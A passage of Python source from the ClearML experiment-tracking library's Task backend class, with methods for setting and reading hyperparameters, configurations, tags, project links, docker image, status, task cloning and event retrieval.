:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
return self._set_parameters(*args, __update=False, **kwargs)
def _set_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not
support parameter descriptions (the input is a dictionary of key-value pairs).
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
def stringify(value):
# return empty string if value is None
if value is None:
return ""
str_value = str(value)
if isinstance(value, (tuple, list, dict)) and 'None' in re.split(r'[ ,\[\]{}()]', str_value):
# If we have None in the string we have to use json to replace it with null,
# otherwise we end up with None as string when running remotely
try:
str_json = json.dumps(value)
# verify we actually have a null in the string, otherwise prefer the str cast
# This is because we prefer to have \' as in str and not \" used in json
if 'null' in re.split(r'[ ,\[\]{}()]', str_json):
return str_json
except TypeError:
# if we somehow failed to json serialize, revert to previous std casting
pass
return str_value
if not all(isinstance(x, (dict, Iterable)) for x in args):
raise ValueError('only dict or iterable are supported as positional arguments')
prefix = kwargs.pop('__parameters_prefix', None)
descriptions = kwargs.pop('__parameters_descriptions', None) or dict()
params_types = kwargs.pop('__parameters_types', None) or dict()
update = kwargs.pop('__update', False)
# new parameters dict
new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args))
new_parameters.update(kwargs)
if prefix:
prefix = prefix.strip('/')
new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items())
# verify parameters type:
not_allowed = {
k: type(v).__name__
for k, v in new_parameters.items()
if not verify_basic_type(v, self._parameters_allowed_types)
}
if not_allowed:
self.log.warning(
"Skipping parameter: {}, only builtin types are supported ({})".format(
', '.join('%s[%s]' % p for p in not_allowed.items()),
', '.join(t.__name__ for t in self._parameters_allowed_types))
)
new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed}
use_hyperparams = Session.check_min_api_version('2.9')
with self._edit_lock:
self.reload()
# if we have a specific prefix and we use hyperparameters, and we use set.
# overwrite only the prefix, leave the rest as is.
if not update and prefix:
parameters = copy(self.get_parameters() or {})
parameters = dict((k, v) for k, v in parameters.items() if not k.startswith(prefix+'/'))
elif update:
parameters = copy(self.get_parameters() or {})
else:
parameters = dict()
parameters.update(new_parameters)
# force cast all variables to strings (so that we can later edit them in UI)
parameters = {k: stringify(v) for k, v in parameters.items()}
if use_hyperparams:
# build nested dict from flat parameters dict:
org_hyperparams = self.data.hyperparams or {}
hyperparams = dict()
# if the task is a legacy task, we should put everything back under Args/key with legacy type
legacy_name = self._legacy_parameters_section_name
org_legacy_section = org_hyperparams.get(legacy_name, dict())
for k, v in parameters.items():
# legacy variable
if org_legacy_section.get(k, tasks.ParamsItem()).type == 'legacy':
section = hyperparams.get(legacy_name, dict())
section[k] = copy(org_legacy_section[k])
section[k].value = str(v) if v else v
description = descriptions.get(k)
if description:
section[k].description = description
hyperparams[legacy_name] = section
continue
org_k = k
if '/' not in k:
k = '{}/{}'.format(self._default_configuration_section_name, k)
section_name, key = k.split('/', 1)
section = hyperparams.get(section_name, dict())
org_param = org_hyperparams.get(section_name, dict()).get(key, tasks.ParamsItem())
param_type = params_types[org_k] if org_k in params_types else org_param.type
if param_type and not isinstance(param_type, str):
param_type = param_type.__name__ if hasattr(param_type, '__name__') else str(param_type)
section[key] = tasks.ParamsItem(
section=section_name, name=key,
value=str(v) if v else v,
description=descriptions[org_k] if org_k in descriptions else org_param.description,
type=param_type,
)
hyperparams[section_name] = section
self._edit(hyperparams=hyperparams)
self.data.hyperparams = hyperparams
else:
execution = self.data.execution
if execution is None:
execution = tasks.Execution(
parameters=parameters, artifacts=[], dataviews=[], model='',
model_desc={}, model_labels={}, docker_cmd='')
else:
execution.parameters = parameters
self._edit(execution=execution)
def set_parameter(self, name, value, description=None, value_type=None):
# type: (str, str, Optional[str], Optional[Any]) -> ()
"""
Set a single Task parameter. This overrides any previous value for this parameter.
:param name: The parameter name.
:param value: The parameter value.
:param description: The parameter description.
:param value_type: The type of the parameters (cast to string and store)
"""
if not Session.check_min_api_version('2.9'):
# not supported yet
description = None
value_type = None
self._set_parameters(
{name: value}, __update=True,
__parameters_descriptions={name: description},
__parameters_types={name: value_type}
)
def get_parameter(self, name, default=None):
# type: (str, Any) -> Any
"""
Get a value for a parameter.
:param name: Parameter name
:param default: Default value
:return: The Parameter value (or default value if parameter is not defined).
"""
params = self.get_parameters()
return params.get(name, default)
def delete_parameter(self, name):
# type: (str) -> bool
"""
Delete a parameter byt it's full name Section/name.
:param name: Parameter name in full, i.e. Section/name. For example, 'Args/batch_size'
:return: True if the parameter was deleted successfully
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Delete hyper parameter is not supported by your clearml-server, "
"upgrade to the latest version")
with self._edit_lock:
paramkey = tasks.ParamKey(section=name.split('/', 1)[0], name=name.split('/', 1)[1])
res = self.send(tasks.DeleteHyperParamsRequest(
task=self.id, hyperparams=[paramkey]), raise_on_errors=False)
self.reload()
return res.ok()
def update_parameters(self, *args, **kwargs):
# type: (*dict, **Any) -> ()
"""
Update the parameters for a Task. This method updates a complete group of key-value parameter pairs, but does
not support parameter descriptions (the input is a dictionary of key-value pairs).
Notice the parameter dict is flat:
i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value"
:param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are
merged into a single key-value pair dictionary.
:param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``.
"""
self._set_parameters(*args, __update=True, **kwargs)
def set_model_label_enumeration(self, enumeration=None):
# type: (Mapping[str, int]) -> ()
"""
Set a dictionary of labels (text) to ids (integers) {str(label): integer(id)}
:param dict enumeration: For example: {str(label): integer(id)}
"""
enumeration = enumeration or {}
with self._edit_lock:
self.reload()
execution = self.data.execution
if enumeration is None:
return
if not (isinstance(enumeration, dict)
and all(isinstance(k, six.string_types) and isinstance(v, int) for k, v in enumeration.items())):
raise ValueError('Expected label to be a dict[str => int]')
execution.model_labels = enumeration
self._edit(execution=execution)
def _set_default_docker_image(self):
# type: () -> ()
if not DOCKER_IMAGE_ENV_VAR.exists():
return
self.set_base_docker(DOCKER_IMAGE_ENV_VAR.get(default=""))
def set_base_docker(self, docker_cmd):
# type: (str) -> ()
"""
Set the base docker image for this experiment
If provided, this value will be used by clearml-agent to execute this experiment
inside the provided docker image.
When running remotely the call is ignored
"""
if not self.running_locally():
return
with self._edit_lock:
self.reload()
execution = self.data.execution
execution.docker_cmd = docker_cmd
self._edit(execution=execution)
def get_base_docker(self):
# type: () -> str
"""Get the base Docker command (image) that is set for this experiment."""
return self._get_task_property('execution.docker_cmd', raise_on_error=False, log_on_error=False)
def set_artifacts(self, artifacts_list=None):
# type: (Sequence[tasks.Artifact]) -> ()
"""
List of artifacts (tasks.Artifact) to update the task
:param list artifacts_list: list of artifacts (type tasks.Artifact)
"""
if not Session.check_min_api_version('2.3'):
return False
if not (isinstance(artifacts_list, (list, tuple))
and all(isinstance(a, tasks.Artifact) for a in artifacts_list)):
raise ValueError('Expected artifacts to [tasks.Artifacts]')
with self._edit_lock:
self.reload()
execution = self.data.execution
keys = [a.key for a in artifacts_list]
execution.artifacts = [a for a in execution.artifacts or [] if a.key not in keys] + artifacts_list
self._edit(execution=execution)
def _set_model_design(self, design=None):
# type: (str) -> ()
with self._edit_lock:
self.reload()
if Session.check_min_api_version('2.9'):
configuration = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
configuration[self._default_configuration_section_name] = tasks.ConfigurationItem(
name=self._default_configuration_section_name, value=str(design))
self._edit(configuration=configuration)
else:
execution = self.data.execution
if design is not None:
# noinspection PyProtectedMember
execution.model_desc = Model._wrap_design(design)
self._edit(execution=execution)
def get_labels_enumeration(self):
# type: () -> Mapping[str, int]
"""
Get the label enumeration dictionary label enumeration dictionary of string (label) to integer (value) pairs.
:return: A dictionary containing the label enumeration.
"""
if not self.data or not self.data.execution:
return {}
return self.data.execution.model_labels
def get_model_design(self):
# type: () -> str
"""
Get the model configuration as blob of text.
:return: The model configuration as blob of text.
"""
if Session.check_min_api_version('2.9'):
design = self._get_task_property(
"configuration", default={}, raise_on_error=False, log_on_error=False) or {}
if design:
design = design.get(sorted(design.keys())[0]).value or ''
else:
design = self._get_task_property(
"execution.model_desc", default={}, raise_on_error=False, log_on_error=False)
# noinspection PyProtectedMember
return Model._unwrap_design(design)
def set_output_model_id(self, model_id):
# type: (str) -> ()
self.data.output.model = str(model_id)
self._edit(output=self.data.output)
def get_random_seed(self):
# type: () -> int
# fixed seed for the time being
return 1337
def set_random_seed(self, random_seed):
# type: (int) -> ()
# fixed seed for the time being
pass
def set_project(self, project_id=None, project_name=None):
# type: (Optional[str], Optional[str]) -> ()
# if running remotely and we are the main task, skip setting ourselves.
if self._is_remote_main_task():
return
if not project_id:
assert isinstance(project_name, six.string_types)
res = self.send(projects.GetAllRequest(name=exact_match_regex(project_name)), raise_on_errors=False)
if not res or not res.response or not res.response.projects or len(res.response.projects) != 1:
return False
project_id = res.response.projects[0].id
assert isinstance(project_id, six.string_types)
self._set_task_property("project", project_id)
self._edit(project=project_id)
def get_project_name(self):
# type: () -> Optional[str]
if self.project is None:
return self._project_name[1] if self._project_name and len(self._project_name) > 1 else None
if self._project_name and self._project_name[1] is not None and self._project_name[0] == self.project:
return self._project_name[1]
res = self.send(projects.GetByIdRequest(project=self.project), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
self._project_name = (self.project, res.response.project.name)
return self._project_name[1]
def get_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("tags")
def set_system_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", tags)
self._edit(system_tags=self.data.system_tags)
else:
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def get_system_tags(self):
# type: () -> Sequence[str]
return self._get_task_property("system_tags" if Session.check_min_api_version('2.3') else "tags")
def set_tags(self, tags):
# type: (Sequence[str]) -> ()
assert isinstance(tags, (list, tuple))
if not Session.check_min_api_version('2.3'):
# not supported
return
self._set_task_property("tags", tags)
self._edit(tags=self.data.tags)
def set_name(self, name):
# type: (str) -> ()
"""
Set the Task name.
:param name: The name of the Task.
:type name: str
"""
self._set_task_property("name", str(name))
self._edit(name=self.data.name)
def set_parent(self, parent):
# type: (Optional[Union[str, Task]]) -> ()
"""
Set the parent task for the Task.
:param parent: The parent task id (or parent Task object) for the Task. Set None for no parent.
:type parent: str or Task
"""
if parent:
assert isinstance(parent, (str, Task))
if isinstance(parent, Task):
parent = parent.parent
assert parent != self.id
self._set_task_property("parent", str(parent) if parent else None)
self._edit(parent=self.data.parent)
def set_comment(self, comment):
# type: (str) -> ()
"""
Set a comment / description for the Task.
:param comment: The comment / description for the Task.
:type comment: str
"""
self._set_task_property("comment", str(comment))
self._edit(comment=comment)
def set_task_type(self, task_type):
# type: (Union[str, Task.TaskTypes]) -> ()
"""
Set the task_type for the Task.
:param task_type: The task_type of the Task (see optional values in TaskTypes).
:type task_type: str or TaskTypes
"""
if not isinstance(task_type, self.TaskTypes):
task_type = self.TaskTypes(task_type)
self._set_task_property("task_type", str(task_type))
self._edit(type=task_type)
def set_archived(self, archive):
# type: (bool) -> ()
"""
Archive the Task or remove it from the archived folder.
:param archive: If True archive the Task, If False make sure it is removed from the archived folder
"""
with self._edit_lock:
system_tags = list(set(self.get_system_tags()) | {self.archived_tag}) \
if archive else list(set(self.get_system_tags()) - {self.archived_tag})
self.set_system_tags(system_tags)
def get_archived(self):
# type: () -> bool
"""
Return the Archive state of the Task
:return: If True the Task is archived, otherwise it is not.
"""
return self.archived_tag in self.get_system_tags()
def set_initial_iteration(self, offset=0):
# type: (int) -> int
"""
Set the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
For example, to start on iteration 100000, including scalars and plots:
..code-block:: py
task.set_initial_iteration(100000)
Task.set_initial_iteration(100000)
:param int offset: Initial iteration (at starting point)
:return: A newly set initial offset.
"""
if not isinstance(offset, int):
raise ValueError("Initial iteration offset must be an integer")
self._initial_iteration_offset = offset
if self._metrics_manager:
self._metrics_manager.set_iteration_offset(self._initial_iteration_offset)
return self._initial_iteration_offset
def get_initial_iteration(self):
# type: () -> int
"""
Get the initial iteration offset. The default value is ``0``. This method is useful when continuing training
from previous checkpoints.
:return: The initial iteration offset.
"""
return self._initial_iteration_offset
def get_status(self):
# type: () -> str
"""
Return The task status without refreshing the entire Task object object (only the status property)
TaskStatusEnum: ["created", "in_progress", "stopped", "closed", "failed", "completed",
"queued", "published", "publishing", "unknown"]
:return: str: Task status as string (TaskStatusEnum)
"""
status = self._get_status()[0]
if self._data:
self._data.status = status
return str(status)
def get_output_log_web_page(self):
# type: () -> str
"""
Return the Task results & outputs web page address.
For example: https://demoapp.demo.clear.ml/projects/216431/experiments/60763e04/output/log
:return: http/s URL link.
"""
return '{}/projects/{}/experiments/{}/output/log'.format(
self._get_app_server(),
self.project if self.project is not None else '*',
self.id,
)
def get_reported_scalars(
self,
max_samples=0, # type: int
x_axis='iter' # type: str
):
# type: (...) -> Mapping[str, Mapping[str, Mapping[str, Sequence[float]]]]
"""
Return a nested dictionary for the scalar graphs,
where the first key is the graph title and the second is the series name.
Value is a dict with 'x': values and 'y': values
.. note::
This call is not cached, any call will retrieve all the scalar reports from the back-end.
If the Task has many scalars reported, it might take long for the call to return.
Example:
.. code-block:: py
{'title': {'series': {
'x': [0, 1 ,2],
'y': [10, 11 ,12],
}}}
:param int max_samples: Maximum samples per series to return. Default is 0 returning all scalars.
With sample limit, average scalar values inside sampling window.
:param str x_axis: scalar x_axis, possible values:
'iter': iteration (default), 'timestamp': seconds from start, 'iso_time': absolute time
:return: dict: Nested scalar graphs: dict[title(str), dict[series(str), dict[axis(str), list(float)]]]
"""
if x_axis not in ('iter', 'timestamp', 'iso_time'):
raise ValueError("Scalar x-axis supported values are: 'iter', 'timestamp', 'iso_time'")
# send request
res = self.send(
events.ScalarMetricsIterHistogramRequest(
task=self.id, key=x_axis, samples=max(1, max_samples) if max_samples else None),
raise_on_errors=False,
ignore_errors=True,
)
if not res:
return {}
response = res.wait()
if not response.ok() or not response.response_data:
return {}
return response.response_data
def get_reported_console_output(self, number_of_reports=1):
# type: (int) -> Sequence[str]
"""
Return a list of console outputs reported by the Task. Retrieved outputs are the most updated console outputs.
:param int number_of_reports: The number of reports to return. The default value is ``1``, indicating the
last (most updated) console output
:return: A list of strings, each entry corresponds to one report.
"""
if Session.check_min_api_version('2.9'):
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
navigate_earlier=True,
batch_size=number_of_reports)
else:
request = events.GetTaskLogRequest(
task=self.id,
order='asc',
from_='tail',
batch_size=number_of_reports)
res = self.send(request)
response = res.wait()
if not response.ok() or not response.response_data.get('events'):
return []
lines = [r.get('msg', '') for r in response.response_data['events']]
return lines
def get_configuration_object(self, name):
# type: (str) -> Optional[str]
"""
Get the Task's configuration object section as a blob of text
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:return: The Task's configuration as a text blob (unconstrained text string)
return None if configuration name is not valid
"""
return self._get_configuration_text(name)
def set_configuration_object(self, name, config_text=None, description=None, config_type=None):
# type: (str, Optional[str], Optional[str], Optional[str]) -> None
"""
Set the Task's configuration object as a blob of text.
Use only for automation (externally), otherwise use `Task.connect_configuration`.
:param str name: Configuration section name
:param config_text: configuration as a blob of text (unconstrained text string)
usually the content of a configuration file of a sort
:param str description: Configuration section description
:param str config_type: Optional configuration format type
"""
return self._set_configuration(
name=name, description=description, config_type=config_type, config_text=config_text)
@classmethod
def get_projects(cls):
# type: () -> (List['projects.Project'])
"""
Return a list of projects in the system, sorted by last updated time
:return: A list of all the projects in the system. Each entry is a `services.projects.Project` object.
"""
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update']), raise_on_errors=True)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()) for p in res.response.projects]
return []
@classmethod
def get_project_id(cls, project_name):
# type: (str) -> Optional[str]
"""
Return a the project unique id (str).
If for than one project match the project_name, return the last updated project
If no project matched the requested name, returns None
:return: Project unique ID (str), or None if no project was found.
"""
assert project_name
assert isinstance(project_name, str)
res = cls._send(
cls._get_default_session(),
projects.GetAllRequest(order_by=['last_update'], name=exact_match_regex(project_name)),
raise_on_errors=False)
if res and res.response and res.response.projects:
return [projects.Project(**p.to_dict()).id for p in res.response.projects][0]
return None
@staticmethod
def running_locally():
# type: () -> bool
"""
Is the task running locally (i.e., ``clearml-agent`` is not executing it)
:return: True, if the task is running locally. False, if the task is not running locally.
"""
return not running_remotely()
@classmethod
def add_requirements(cls, package_name, package_version=None):
# type: (str, Optional[str]) -> ()
"""
Force the adding of a package to the requirements list. If ``package_version`` is not specified, use the
installed package version, if found.
:param str package_name: The package name to add to the "Installed Packages" section of the task.
:param package_version: The package version requirements. If ``None``, then use the installed version.
"""
cls._force_requirements[package_name] = package_version
def _get_models(self, model_type='output'):
# type: (str) -> Sequence[Model]
# model_type is either 'output' or 'input'
model_type = model_type.lower().strip()
assert model_type == 'output' or model_type == 'input'
if model_type == 'input':
regex = r'((?i)(Using model id: )(\w+)?)'
compiled = re.compile(regex)
ids = [i[-1] for i in re.findall(compiled, self.comment)] + (
[self.input_model_id] if self.input_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
in_model = []
for i in ids:
m = TrainsModel(model_id=i)
# noinspection PyBroadException
try:
# make sure the model is is valid
# noinspection PyProtectedMember
m._get_model_data()
in_model.append(m)
except Exception:
pass
return in_model
else:
res = self.send(
models.GetAllRequest(
task=[self.id],
order_by=['created'],
only_fields=['id']
)
)
if not res.response.models:
return []
ids = [m.id for m in res.response.models] + ([self.output_model_id] if self.output_model_id else [])
# remove duplicates and preserve order
ids = list(OrderedDict.fromkeys(ids))
from ...model import Model as TrainsModel
return [TrainsModel(model_id=i) for i in ids]
def _get_default_report_storage_uri(self):
# type: () -> str
if self._offline_mode:
return str(self.get_offline_mode_folder() / 'data')
if not self._files_server:
self._files_server = Session.get_files_server_host()
return self._files_server
def _get_status(self):
# type: () -> (Optional[str], Optional[str])
if self._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
def _reload_last_iteration(self):
# type: () -> ()
# noinspection PyBroadException
try:
all_tasks = self.send(
tasks.GetAllRequest(id=[self.id], only_fields=['last_iteration']),
).response.tasks
self.data.last_iteration = all_tasks[0].last_iteration
except Exception:
return None
def _clear_task(self, system_tags=None, comment=None):
# type: (Optional[Sequence[str]], Optional[str]) -> ()
self._data.script = tasks.Script(
binary='', repository='', tag='', branch='', version_num='', entry_point='',
working_dir='', requirements={}, diff='',
)
self._data.execution = tasks.Execution(
artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, parameters={}, docker_cmd='')
self._data.comment = str(comment)
self._storage_uri = None
self._data.output.destination = self._storage_uri
self._update_requirements('')
if Session.check_min_api_version('2.9'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='',
hyperparams=dict(), configuration=dict())
elif Session.check_min_api_version('2.3'):
self._set_task_property("system_tags", system_tags)
self._edit(system_tags=self._data.system_tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest='')
else:
self._set_task_property("tags", system_tags)
self._edit(tags=self._data.tags, comment=self._data.comment,
script=self._data.script, execution=self._data.execution, output_dest=None)
@classmethod
def _get_api_server(cls):
# type: () -> ()
return Session.get_api_server_host()
def _get_app_server(self):
# type: () -> str
if not self._app_server:
self._app_server = Session.get_app_server_host()
return self._app_server
def _is_remote_main_task(self):
# type: () -> bool
"""
:return: return True if running remotely and this Task is the registered main task
"""
return running_remotely() and get_remote_task_id() == self.id
def _edit(self, **kwargs):
# type: (**Any) -> Any
with self._edit_lock:
if self._offline_mode:
for k, v in kwargs.items():
setattr(self.data, k, v)
Path(self.get_offline_mode_folder()).mkdir(parents=True, exist_ok=True)
with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'wt') as f:
export_data = self.data.to_dict()
export_data['project_name'] = self.get_project_name()
export_data['offline_folder'] = self.get_offline_mode_folder().as_posix()
json.dump(export_data, f, ensure_ascii=True, sort_keys=True)
return None
# Since we ae using forced update, make sure he task status is valid
status = self._data.status if self._data and self._reload_skip_flag else self.data.status
if status not in (tasks.TaskStatusEnum.created, tasks.TaskStatusEnum.in_progress):
# the exception being name/comment that we can always change.
if kwargs and all(k in ('name', 'comment', 'tags', 'system_tags') for k in kwargs.keys()):
pass
else:
raise ValueError('Task object can only be updated if created or in_progress')
res = self.send(tasks.EditRequest(task=self.id, force=True, **kwargs), raise_on_errors=False)
return res
def _update_requirements(self, requirements):
# type: (Union[dict, str]) -> ()
if not isinstance(requirements, dict):
requirements = {'pip': requirements}
# protection, Old API might not support it
# noinspection PyBroadException
try:
with self._edit_lock:
self.reload()
self.data.script.requirements = requirements
if self._offline_mode:
self._edit(script=self.data.script)
else:
self.send(tasks.SetRequirementsRequest(task=self.id, requirements=requirements))
except Exception:
pass
def _update_script(self, script):
# type: (dict) -> ()
with self._edit_lock:
self.reload()
self.data.script = script
self._edit(script=script)
def _set_configuration(self, name, description=None, config_type=None, config_text=None, config_dict=None):
# type: (str, Optional[str], Optional[str], Optional[str], Optional[Mapping]) -> None
"""
Set Task configuration text/dict. Multiple configurations are supported.
:param str name: Configuration name.
:param str description: Configuration section description.
:param str config_type: Optional configuration format type (str).
:param config_text: model configuration (unconstrained text string). usually the content
of a configuration file. If `config_text` is not None, `config_dict` must not be provided.
:param config_dict: model configuration parameters dictionary.
If `config_dict` is not None, `config_text` must not be provided.
"""
# make sure we have wither dict or text
mutually_exclusive(config_dict=config_dict, config_text=config_text, _check_none=True)
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
if description:
description = str(description)
# support empty string
a_config = config_dict_to_text(config_dict if config_text is None else config_text)
with self._edit_lock:
self.reload()
configuration = self.data.configuration or {}
configuration[name] = tasks.ConfigurationItem(
name=name, value=a_config, description=description or None, type=config_type or None)
self._edit(configuration=configuration)
def _get_configuration_text(self, name):
# type: (str) -> Optional[str]
"""
Get Task configuration section as text
:param str name: Configuration name.
:return: The Task configuration as text (unconstrained text string).
return None if configuration name is not valid.
"""
if not Session.check_min_api_version('2.9'):
raise ValueError("Multiple configurations is not supported with the current 'clearml-server', "
"please upgrade to the latest version")
configuration = self.data.configuration or {}
if not configuration.get(name):
return None
return configuration[name].value
def _get_configuration_dict(self, name):
# type: (str) -> Optional[dict]
"""
Get Task configuration section as dictionary
:param str name: Configuration name.
:return: The Task configuration as dictionary.
return None if configuration name is not valid.
"""
config_text = self._get_configuration_text(name)
if not config_text:
return None
return text_to_config_dict(config_text)
def get_offline_mode_folder(self):
# type: () -> (Optional[Path])
"""
Return the folder where all the task outputs and logs are stored in the offline session.
:return: Path object, local folder, later to be used with `report_offline_session()`
"""
if not self._offline_mode:
return None
return get_offline_dir(task_id=self.task_id)
@classmethod
def _clone_task(
cls,
cloned_task_id, # type: str
name=None, # type: Optional[str]
comment=None, # type: Optional[str]
execution_overrides=None, # type: Optional[dict]
tags=None, # type: Optional[Sequence[str]]
parent=None, # type: Optional[str]
project=None, # type: Optional[str]
log=None, # type: Optional[logging.Logger]
session=None, # type: Optional[Session]
):
# type: (...) -> str
"""
Clone a task
:param str cloned_task_id: Task ID for the task to be cloned
:param str name: New for the new task
:param str comment: Optional comment for the new task
:param dict execution_overrides: Task execution overrides. Applied over the cloned task's execution
section, useful for overriding values in the cloned task.
:param list tags: Optional updated model tags
:param str parent: Optional parent Task ID of the new task.
:param str project: Optional project ID of the new task.
If None, the new task will inherit the cloned task's project.
:param logging.Logger log: Log object used by the infrastructure.
:param Session session: Session object used for sending requests to the API
:return: The new tasks's ID.
"""
session = session if session else cls._get_default_session()
use_clone_api = Session.check_min_api_version('2.9')
if use_clone_api:
res = cls._send(
session=session, log=log,
req=tasks.CloneRequest(
task=cloned_task_id,
new_task_name=name,
new_task_tags=tags,
new_task_comment=comment,
new_task_parent=parent,
new_task_project=project,
execution_overrides=execution_overrides,
)
)
cloned_task_id = res.response.id
return cloned_task_id
res = cls._send(session=session, log=log, req=tasks.GetByIdRequest(task=cloned_task_id))
task = res.response.task
output_dest = None
if task.output:
output_dest = task.output.destination
execution = task.execution.to_dict() if task.execution else {}
execution = ConfigTree.merge_configs(ConfigFactory.from_dict(execution),
ConfigFactory.from_dict(execution_overrides or {}))
# clear all artifacts
execution['artifacts'] = [e for e in execution['artifacts'] if e.get('mode') == 'input']
if not hasattr(task, 'system_tags') and not tags and task.tags:
tags = [t for t in task.tags if t != cls._development_tag]
extra = {}
if hasattr(task, 'hyperparams'):
extra['hyperparams'] = task.hyperparams
if hasattr(task, 'configuration'):
extra['configuration'] = task.configuration
if getattr(task, 'system_tags', None):
extra['system_tags'] = [t for t in task.system_tags if t not in (cls._development_tag, cls.archived_tag)]
req = tasks.CreateRequest(
name=name or task.name,
type=task.type,
input=task.input if hasattr(task, 'input') else {'view': {}},
tags=tags,
comment=comment if comment is not None else task.comment,
parent=parent,
project=project if project else task.project,
output_dest=output_dest,
execution=execution.as_plain_ordered_dict(),
script=task.script,
**extra
)
res = cls._send(session=session, log=log, req=req)
cloned_task_id = res.response.id
if task.script and task.script.requirements:
cls._send(session=session, log=log, req=tasks.SetRequirementsRequest(
task=cloned_task_id, requirements=task.script.requirements))
return cloned_task_id
@classmethod
def get_all(cls, session=None, log=None, **kwargs):
# type: (Optional[Session], Optional[logging.Logger], **Any) -> Any
"""
List all the Tasks based on specific projection.
:param Session session: The session object used for sending requests to the API.
:param logging.Logger log: The Log object.
:param kwargs: Keyword args passed to the GetAllRequest
(see :class:`.backend_api.services.v2_5.tasks.GetAllRequest`)
For example:
.. code-block:: bash
status='completed', 'search_text'='specific_word', 'user'='user_id', 'project'='project_id'
:type kwargs: dict
:return: The API response.
"""
session = session if session else cls._get_default_session()
req = tasks.GetAllRequest(**kwargs)
res = cls._send(session=session, req=req, log=log)
return res
@classmethod
def get_by_name(cls, task_name):
# type: (str) -> Task
res = cls._send(cls._get_default_session(), tasks.GetAllRequest(name=exact_match_regex(task_name)))
task = get_single_result(entity='task', query=task_name, results=res.response.tasks)
return cls(task_id=task.id)
@classmethod
def _get_project_name(cls, project_id):
res = cls._send(cls._get_default_session(), projects.GetByIdRequest(project=project_id), raise_on_errors=False)
if not res or not res.response or not res.response.project:
return None
return res.response.project.name
def _get_all_events(
self, max_events=100, batch_size=500, order='asc', event_type=None, unique_selector=itemgetter("url")
):
# type: (int, int, str, str, Callable[[dict], Any]) -> Union[List[Any], Set[Any]]
"""
Get a list of all reported events.
Warning: Debug only. Do not use outside of testing.
:param max_events: The maximum events the function will return. Pass None
to return all the reported events.
:param batch_size: The maximum number of events retrieved by each internal call performed by this method.
:param order: Events order (by timestamp) - "asc" for ascending, "desc" for descending.
:param event_type: Event type. Pass None to get all event types.
:param unique_selector: If provided, used to select a value from each event, only a unique set of these
values will be returned by this method.
:return: A list of events from the task. If unique_selector was provided, a set of values selected from events
of the task.
"""
batch_size = max_events or batch_size
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
))
returned_count = log_events.response.returned
total_events = log_events.response.total
scroll = log_events.response.scroll_id
if unique_selector:
events_list = set(map(unique_selector, log_events.response.events))
else:
events_list = log_events.response.events
while returned_count < total_events and (max_events is None or len(events_list) < max_events):
log_events = self.send(events.GetTaskEventsRequest(
task=self.id,
order=order,
batch_size=batch_size,
event_type=event_type,
scroll_id=scroll,
))
scroll = log_events.response.scroll_id
returned_count += log_events.response.returned
if unique_selector:
events_list.update(log_events.response.events)
else:
events_list.extend(log_events.response.events)
return events_list
@property
def _edit_lock(self):
# type: () -> ()
# skip the actual lock, this one-time lock will always enter
# only used on shutdown process to avoid deadlocks
if self.__edit_lock is False:
return RLock()
if self.__edit_lock:
return self.__edit_lock
if not PROC_MASTER_ID_ENV_VAR.get() or len(PROC_MASTER_ID_ENV_VAR.get().split(':')) < 2:
self.__edit_lock = RLock()
elif PROC_MASTER_ID_ENV_VAR.get().split(':')[1] == str(self.id):
filename = os.path.join(gettempdir(), 'clearml_{}.lock'.format(self.id))
# no need to remove previous file lock if we have a dead process, it will automatically release the lock.
# # noinspection PyBroadException
# try:
# os.unlink(filename)
# except Exception:
# pass
# create a new file based lock
self.__edit_lock = FileRLock(filename=filename)
else:
self.__edit_lock = RLock()
return self.__edit_lock
@_edit_lock.setter
def _edit_lock(self, value):
# type: (RLock) -> ()
self.__edit_lock = value
@classmethod
def __update_master_pid_task(cls, pid=None, task=None):
# type: (Optional[int], Union[str, Task]) -> ()
pid = pid or os.getpid()
if not task:
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':')
elif isinstance(task, str):
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + task)
else:
# noinspection PyUnresolvedReferences
PROC_MASTER_ID_ENV_VAR.set(str(pid) + ':' + str(task.id))
# make sure we refresh the edit lock next time we need it,
task._edit_lock = None
@classmethod
def __get_master_id_task_id(cls):
# type: () -> Optional[str]
